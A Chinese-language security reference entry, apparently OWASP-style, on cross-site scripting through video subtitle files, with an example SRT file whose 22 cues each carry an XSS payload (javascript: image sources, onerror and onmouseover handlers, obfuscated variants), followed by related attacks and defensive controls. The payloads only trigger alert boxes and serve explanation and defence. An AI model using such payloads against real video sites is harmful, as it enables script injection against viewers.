概述
攻击者可能在视频的字幕中执行JavaScript。这也被称为XSS(Cross-Site Scripting)。如果网站在浏览器中独立加载字幕,攻击者可以在视频字幕中运行任何html或javascript。它已经在一些视频服务上进行了测试。
实例
攻击者可以通过srt的格式保存下面提到的内容,并将准备好的srt文件上传为视频的字幕
1
00:00:37,618 --> 00:00:42,557
<font color="#ffff00">: '';!--"<XSS>=&{()}</font>
2
00:00:58,425 --> 00:01:00,704
<IMG SRC="javascript:alert('XSS');">
3
00:01:00,705 --> 00:01:01,873
<IMG SRC=javascript:alert('XSS')>
4
00:01:02,225 --> 00:01:04,519
<IMG SRC=javascript:alert('XSS')>
5
00:01:04,520 --> 00:01:05,547
<IMG SRC=javascript:alert('XSS')>
6
00:01:05,864 --> 00:01:08,117
<IMG SRC=javascript:alert('XSS')>
7
00:01:08,224 --> 00:01:09,223
<IMG """>alert("XSS")">
8
00:01:09,224 --> 00:01:10,434
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
9
00:01:11,384 --> 00:01:12,427
<IMG SRC=# onmouseover="alert('xxs')">
10
00:01:15,504 --> 00:01:17,506
<IMG SRC= onmouseover="alert('xxs')">
11
00:01:19,743 --> 00:01:20,786
<IMG onmouseover="alert('xxs')">
12
00:01:24,183 --> 00:01:25,351
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
13
00:01:40,663 --> 00:01:41,705
<img src=x onerror="javascript:alert('XSS')">
14
00:01:42,703 --> 00:01:45,742
<IMG SRC=javascript:alert( 'XSS')>
15
00:01:45,743 --> 00:01:46,285
<IMG SRC=javascript:a& #0000108ert('XSS')>
16
00:01:48,503 --> 00:01:49,545
<IMG SRC=javascript:alert('XSS')>
17
00:01:49,582 --> 00:01:51,709
<IMG SRC=javascript:alert('XSS')>
18
00:01:54,822 --> 00:01:58,200
<IMG SRC="jav ascript:alert('XSS');">
19
00:02:01,021 --> 00:02:03,691
<IMG SRC="jav ascript:alert('XSS');">
20
00:02:04,702 --> 00:02:05,744
<IMG SRC="jav
ascript:alert('XSS');">
21
00:02:15,700 --> 00:02:18,536
<IMG SRC="javascript:alert('XSS')"
22
00:02:18,740 --> 00:02:22,619
\";alert('XSS');//
作者和主要编辑
Mohammad MortazaviZade – 2mzrp2@gmail.com
相关攻击
- XSS攻击(XSS Attacks)
- 注入攻击(Injection Attack)
- 调用不可信的移动代码(Invoking untrusted mobile code)
- 跨站点历史操作(XSHM)
相关漏洞
- 输入验证漏洞(Input Validation Vulnerability)
- XSS漏洞(Cross Site Scripting Flaw)
- XSS的类型(Types of Cross-Site Scripting)
相关控件
- 输入验证(Input Validation)
- HTML实体编码(HTML Entity Encoding)
- 输出验证(Output Validation)
- 规范化(Canonicalization)